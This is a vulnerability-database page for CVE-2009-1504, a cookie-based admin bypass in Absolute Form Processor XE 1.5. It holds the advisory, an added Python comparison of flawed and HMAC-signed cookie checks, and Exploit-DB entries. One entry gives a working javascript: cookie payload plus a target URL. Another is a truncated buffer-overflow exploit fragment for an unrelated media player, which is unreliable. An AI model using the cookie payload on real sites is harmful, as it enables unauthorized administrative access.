CVE-2009-1504
published 2009-05-01
CVE-2009-1504: Absolute Form Processor XE 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the xlaAFPadmin cookie to…
Priority P354 | high | 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.43% (82.2th percentile)
Absolute Form Processor XE 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the xlaAFPadmin cookie to "lvl=1&userid=1."
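The flaw class described above, as an added example that is not the vendor's code or part of the original advisory: a check that trusts the `lvl` and `userid` fields of a client-supplied cookie, next to a hardened form that only accepts a cookie carrying a server-computed HMAC tag. The function names, the `payload.tag` cookie layout and the key are assumptions made for illustration, and Python stands in for the product's ASP.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed demo key (assumption); a real deployment loads a random secret server-side.
SECRET_KEY = b"constructed-demo-key-not-for-production"

def parse_admin_cookie(value):
    """Parse the 'lvl=1&userid=1' key/value layout named in the advisory."""
    return {k: v[0] for k, v in parse_qs(value).items()}

def is_admin_vulnerable(cookies):
    """Assumed flawed pattern: privilege is read straight from client data."""
    fields = parse_admin_cookie(cookies.get("xlaAFPadmin", ""))
    return fields.get("lvl") == "1" and "userid" in fields

def _tag(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()

def issue_cookie(userid, lvl):
    """Hardened: called only after a real login; binds the fields to a server tag."""
    payload = f"lvl={lvl}&userid={userid}"
    return f"{payload}.{_tag(payload)}"

def is_admin_hardened(cookies):
    """Reject any cookie whose tag was not produced with the server's key."""
    payload, sep, tag = cookies.get("xlaAFPadmin", "").rpartition(".")
    if not sep:
        return False  # no tag at all, e.g. the bare value from the advisory
    # Compare as bytes in constant time; also tolerates non-ASCII client input.
    if not hmac.compare_digest(tag.encode(), _tag(payload).encode()):
        return False
    return parse_admin_cookie(payload).get("lvl") == "1"

if __name__ == "__main__":
    # Constructed requests: the advisory's cookie value, then a server-issued one.
    forged = {"xlaAFPadmin": "lvl=1&userid=1"}
    issued = {"xlaAFPadmin": issue_cookie(userid=1, lvl=1)}
    print("forged, vulnerable check:", is_admin_vulnerable(forged))
    print("forged, hardened check:  ", is_admin_hardened(forged))
    print("issued, hardened check:  ", is_admin_hardened(issued))
```

A server-side session keyed by a random identifier removes the need to carry privilege fields in the cookie at all; the signed form shown here would additionally need an expiry field in the tagged payload.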
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xigla | absolute_control_panel_xe | — | — |
No detection rules found.
Exploit-DB
Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
exploitdb·2009-04-24
CVE-2009-1504 Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
---
[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: [email protected]
[~]
[~] N0T: Everyone has become a hacker :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------
exploit:
javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";
after you go here:
http://www.xigla.com/absolutefp/demo/menu.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N &
Exploit-DB
CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow
exploitdb·2009-04-23
CVE-2009-1449 CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow
---
# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# By Stack Sysworm.com
# Note about this Exploit : right click >> Option >> Open >> select our target file and boooooom calc executed :d
# Note about the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didn't be the same for my sweety friend His0ka
# When i test his exploit it didn't work and the ret address be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box
# Thnx for all friend ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......
# Thnx for the great str0ke thnx for your support :d
chars = "\x41" * 1504
eip
No writeups or analysis indexed.
Published: 2009-05-01